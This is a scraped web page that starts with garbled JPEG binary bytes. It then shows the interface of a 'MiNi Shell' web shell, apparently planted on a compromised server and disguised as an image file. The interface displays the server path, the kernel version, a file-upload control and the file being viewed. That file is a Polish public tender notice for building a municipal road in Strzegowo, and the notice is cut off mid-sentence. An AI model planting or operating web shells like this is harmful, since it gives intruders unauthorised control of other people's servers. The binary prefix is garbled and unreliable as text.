JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250624/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250624/0029082601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi gminnej relacji Chądzyny Kuski – Chądzyny Krusze </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STRZEGOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378440</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Wolności 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzegowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-445</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@strzegowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strzegowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi gminnej relacji Chądzyny Kuski – Chądzyny Krusze </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-de622c09-9ae6-456f-96ff-65b8b79c8241</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00290826</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038658/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.17 Budowa drogi gminnej Chądzyny Kuski - Chądzyny Krusze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-de622c09-9ae6-456f-96ff-65b8b79c8241 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, wskazane w niniejszej specyfikacji, sporządza się w postaci elektronicznej, w formatach danych<br/>określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju<br/>przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww.<br/>regulacje nie będą miały bezpośredniego zastosowania.<br/>4. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>5. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U.<br/>z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę<br/>przedsiębiorstwa”.<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>7. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>8. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>9. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>10. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>11. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@strzegowo.pl (nie dotyczy składania ofert)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Strzegowo (dalej:<br/>pomocą poczty tradycyjnej na adres: Plac Wolności 32, 06-445 Strzegowo lub drogą e-mailową pod adresem: ug@strzegowo.pl<br/>2. Administrator wyznaczył Inspektora Ochrony Danych - Andrzeja Rybus-Tołłoczko, z którym można się skontaktować pod adresem<br/>mailowym: iodo@rt-net.pl.<br/>3. Dane osobowe są przetwarzane na podstawie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) oraz ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych.<br/>4. Przetwarzanie danych osobowych odbywa się w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego – art. 6 ust. 1 lit. c, e RODO,<br/>5. Dane osobowe nie pochodzą od stron trzecich.<br/>6. Administrator nie zamierza przekazywać danych do państwa trzeciego lub organizacji<br/>międzynarodowej.<br/>7. Administrator będzie przekazywał dane osobowe innym podmiotom, tylko na podstawie przepisów<br/>prawa, w tym w szczególności do: Urzędu Zamówień Publicznych, organów kontrolnych, a także na<br/>podstawie zawartych umów powierzenia przetwarzania danych osobowych, w tym do dostawców usług teleinformatycznych.<br/>8. Dane osobowe będą przetwarzane przez Administratora do 5 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, zgodnie z przepisami prawa. 9. Osoba, której dane dotyczą ma prawo do<br/>żądania od administratora dostępu do danych osobowych, ich sprostowania, usunięcia lub ograniczenia przetwarzania oraz o prawo<br/>do wniesienia sprzeciwu wobec przetwarzania, a także prawo do przenoszenia danych.<br/>9. Skargę nas działania Administratora można wnieść do Prezesa Urzędu Ochrony Danych<br/>Osobowych.<br/>10. Podanie danych osobowych jest wymogiem udziału w postępowaniu o udzielenie zamówienia. Ich<br/>niepodanie spowoduje brak możliwości udziału w postępowaniu.<br/>11. Administrator nie przewiduje zautomatyzowanego podejmowania decyzji.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Budowa drogi gminnej relacji Chądzyny Kuski – Chądzyny Krusze.<br/>Zakres przedmiotu zamówienia obejmuje zadania:<br/>Zadanie nr 1 - odcinek od km 0+000 do km 1+410, współfinansowany z Rządowego<br/>Funduszu Rozwoju Dróg,<br/>Zadanie nr 2 - odcinek od km 0+000 do km 0+181.<br/>Uwaga:<br/>Dokumentacja projektowa załączona do SWZ obejmuje odcinki:<br/>Nr 1 od km 0+000 do km 2+026,<br/>Nr 2 od km 0+000 do km 0+181,<br/>a więc przedmiot niniejszego zamówienia nie obejmuje całości robót ujętych w dokumentacji projektowej.<br/>Podstawowe parametry techniczne drogi gminnej<br/>Droga gminna nr – 230528W<br/>Kategoria ruchu – KR1<br/>klasa techniczna drogi – D<br/>prędkość projektowa – V = 30 km/h<br/>- szerokość jezdni – 3,50-5,00 m<br/>- pobocza – 2 x 0,75-1,25 m<br/>- chodnik – 2,00 m<br/>spadek poprzeczny nawierzchni jezdni daszkowy lub jednostronny – 1-2%<br/>Projektowana nawierzchnia posiada przybliżony przebieg istniejącej jezdni asfaltowej. Dla poprawienia lokalizacji drogi w<br/>pasie drogowym zastosowano punkty kontrolne. Droga gminna kategorii D o przekroju dwukierunkowym, przeznaczona do<br/>ruchu w obu kierunkach o szerokości jezdni 3,50-5,00 m, pobocza obustronne po 0,75-1,25 m. Dla poprawy bezpieczeństwa<br/>ruchu drogowego, w celu umożliwienia minięcia się pojazdów, zaprojektowano poszerzenia jezdni.<br/>Zjazdy zwykłe z asfaltowe zaprojektowano o szerokości 6,50 m, na tą szerokość składa się jezdnia o szerokości 5,00 m,<br/>oraz obustronne pobocza po 0,75 m, a przecięcie krawędzi jezdni i zjazdu skosami 1,0-2,5:1,0-2,5 m lub wyokrąglone<br/>łukiem kołowym o promieniu 5,0 m.<br/>Na całym odcinku budowanej drogi zaprojektowano odwodnienie w postaci rowów przydrożnych lub poboczy chłonnych z<br/>drenażem francuskim.<br/>Konstrukcja nakładki na istniejącej jezdni asfaltowej:<br/>a) nawierzchnia z mieszanki mineralno-bitumicznej AC 11 S wg PN-EN-13108-1 (lepiszcze asfaltowe 50/70) gr. 4 cm –<br/>warstwa ścieralna,<br/>b) skropienie nawierzchni drogowych asfaltem w ilości 0,5 dm³/m²,<br/>c) nawierzchnia z mieszanki mineralno-bitumicznej AC 16 W wg PN-EN-13108-1 (lepiszcze asfaltowe 50/70) gr. 5 cm –<br/>warstwa wiążąca,<br/>d) skropienie nawierzchni drogowych asfaltem w ilości 0,8 dm³/m²,<br/>e) podbudowa z kruszywa łamanego o uziarnieniu 0-31,5mm gr. 20 cm – na poszerzeniu,<br/>f) podbudowa z kruszywa naturalnego 0-31,50 mm gr. 20 cm – na poszerzeniu.<br/>Konstrukcja odc 1 od km 0+000 do km 0+040:<br/>a) nawierzchnia z mieszanki mineralno-bitumicznej AC 11 S wg PN-EN-13108-1 (lepiszcze asfaltowe 50/70) gr. 4 cm –<br/>warstwa ścieralna,<br/>b) skropienie nawierzchni drogowych asfaltem w ilości 0,5 dm³/m²,<br/>c) nawierzchnia z mieszanki mineralno-bitumicznej AC 16 W wg PN-EN-13108-1 (lepiszcze asfaltowe 50/70) gr. 5 cm –<br/>warstwa wiążąca,<br/>d) skropienie nawierzchni drogowych asfaltem w ilości 0,8 dm³/m²,<br/>e) podbudowa z kruszywa łamanego o uziarnieniu 0-31,5mm gr. 10 cm,<br/>f) podbudowa z kruszywa łamanego o uziarnieniu 0-31,5mm gr. 20 cm – na poszerzeniu,<br/>g) podbudowa z kruszywa naturalnego 0-31,50 mm gr. 20 cm – na poszerzeniu.<br/>Konstrukcja pobocza:<br/>a) nawierzchnia z kruszywa łamanego o uziarnieniu 0-31,5mm stabilizowanego mechanicznie gr. 9 cm<br/>b) warstwa z kruszywa łamanego o uziarnieniu 0-31,5mm stabilizowanego mechanicznie gr. 10 cm (na odcinkach<br/>wykonania jezdni z podbudową)<br/>c) uzupełnienie pospółka do wymaganej wysokości (nasyp z materiału typu G1).<br/>Konstrukcja pobocza z drenażem francuskim:<br/>a) nawierzchnia z kruszywa łamanego o uziarnieniu 0÷31,5 mm, gr. 9 cm,<br/>b) warstwa filtracyjna z kruszywa łamanego 4-31,5 mm w oplocie z geowłókniny<br/>gr. ± 30 cm.<br/>Konstrukcja zjazdów o nawierzchni asfaltowej:<br/>a) nawierzchnia z mieszanki mineralno-bitumicznej AC 11 S wg PN-EN-13108-1 (lepiszcze asfaltowe 50/70) gr. 5 cm –<br/>warstwa ścieralna,<br/>b) warstwa podbudowy z kruszywa łamanego o uziarnieniu 0÷31,5 mm gr. 20 cm<br/>c) warstwa podbudowy z kruszywa naturalnego – pospółka o uziarnieniu 0÷31,5 mm gr. 20 cm.<br/>Konstrukcja zjazdów o nawierzchni z kruszywa łamanego:<br/>a) nawierzchnia z kruszywa łamanego o uziarnieniu 0÷31,5 mm gr. 15 cm<br/>b) warstwa podbudowy z kruszywa naturalnego – pospółka o uziarnieniu 0÷31,5 mm gr. 10 cm .<br/>Projektowane przepusty poprzeczne pod koroną drogi PEHD Ø 60 cm.<br/>Projektowane przepusty pod zjazdami zwykłymi PCV Ø 40-60 cm.<br/>2. Opis przedmiotu zamówienia stanowią:<br/>1/ Decyzja – zezwolenie na realizacje inwestycji drogowej, wraz z decyzją zmieniającą,<br/>2/ Dokumentacja projektowa:<br/>- projekt zagospodarowania terenu,<br/>- projekt architektoniczno – budowlany,<br/>- projekt techniczny,<br/>- projekt wykonawczy,<br/>- projekt stałej organizacji ruchu,<br/>- pozwolenie wodnoprawne,<br/>- inwentaryzacja zieleni przeznaczonej do wycinki,<br/>3/ specyfikacja techniczna wykonania i odbioru robót budowlanych,<br/>3. Jeżeli w opisie przedmiotu zamówienia w niniejszym postępowaniu – także w dokumentacji projektowej służącej do opisu<br/>przedmiotu zamówienia na wykonanie robót budowlanych, znajdują się jakiekolwiek znaki towarowe, patenty czy<br/>pochodzenie, źródła lub szczególne procesy, które charakteryzują produkty lub usługi dostarczane przez konkretnego<br/>wykonawcę, zamawiający dopuszcza rozwiązania równoważne („lub równoważne” – art. 99 ust 5 ustawy Pzp). Zamawiający<br/>przygotowując opis przedmiotu zamówienia na podstawie dokumentacji projektowej nie znalazł żadnych znaków<br/>towarowych, patentów czy pochodzenia, źródeł lub szczególnych procesów, które charakteryzują produkty lub usługi<br/>dostarczane przez konkretnego Wykonawcę. Jeżeli jednak wykonawca stwierdzi/ zauważy, analizując opis przedmiotu<br/>zamówienia, że znajdują się takie przypadki lub pośrednio wskazujące na jeden konkretny produkt, prosi się Wykonawcę,<br/>aby zgodnie z art. 284 ust. 1 ustawy pzp zwracając się do zamawiającego o wyjaśnienie treści SWZ wskazał takie produkty.<br/>Wówczas jako wyjaśnienie/zmiana treści SWZ, zamawiający wspólnie z autorem dokumentacji projektowej sprecyzuje, jakie<br/>cechy zamawianego produktu mają dla niego walor równoważny, które będą brane pod uwagę przy ocenie oraz określi<br/>kryteria stosowane w celu równoważności. Podobna zasada obowiązuje w przypadkach, gdy w opisie przedmiotu<br/>zamówienia zostały wprowadzone odniesienia do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy pzp.<br/>6. W przypadku gdy opis przedmiotu zamówienia odnosi się do norm, ocen technicznych, specyfikacji technicznych i<br/>systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp, zamawiający nie może<br/>odrzucić oferty tylko dlatego, że oferowane roboty budowlane, dostawy lub usługi nie są zgodne z normami, ocenami<br/>technicznymi, specyfikacjami technicznymi i systemami referencji technicznych, do których opis przedmiotu zamówienia się<br/>odnosi, pod warunkiem że wykonawca udowodni w ofercie, w szczególności za pomocą przedmiotowych środków<br/>dowodowych, o których mowa w art. 104–107 ustawy Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają<br/>wymagania określone w opisie przedmiotu zamówienia.<br/>4. Oferowanie rozwiązań równoważnych do wskazanych w opisie przedmiotu zamówienia wymaga wykazania, że<br/>oferowane rozwiązanie równoważne jest o parametrach techniczno – eksploatacyjno - użytkowych nie gorszych niż<br/>wymagane przez zamawiającego. Ciężar wykazania spełnienia tych wymagań leży po stronie wykonawcy w składanej<br/>ofercie.<br/>5. Wykonawca, który powołuje się na rozwiązania równoważne musi dodatkowo wykazać<br/>w ofercie, że oferowane przez niego dostawy/usługi/roboty budowlane spełniają wszystkie wymagania określone przez<br/>zamawiającego w treści SWZ i w postępowaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112730-1 - Roboty w zakresie kształtowania dróg i autostrad</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów. Za najkorzystniejszą zostanie<br/>uznana oferta, która uzyska największą sumę punktów w obu kryteriach w oparciu o następujący wzór:<br/>P = Pc + Pg ,<br/>P = suma punktów jaką Wykonawca uzyskał za oba kryteria oceny ofert<br/>Pc - liczba punktów otrzymanych w kryterium „cena”,<br/>Pg - liczba punktów otrzymanych w kryterium „okres gwarancji”,<br/>2. Zamawiający dokona obliczeń ilości punktów wg poniższych wzorów z dokładnością do dwóch miejsc po przecinku, dla ofert 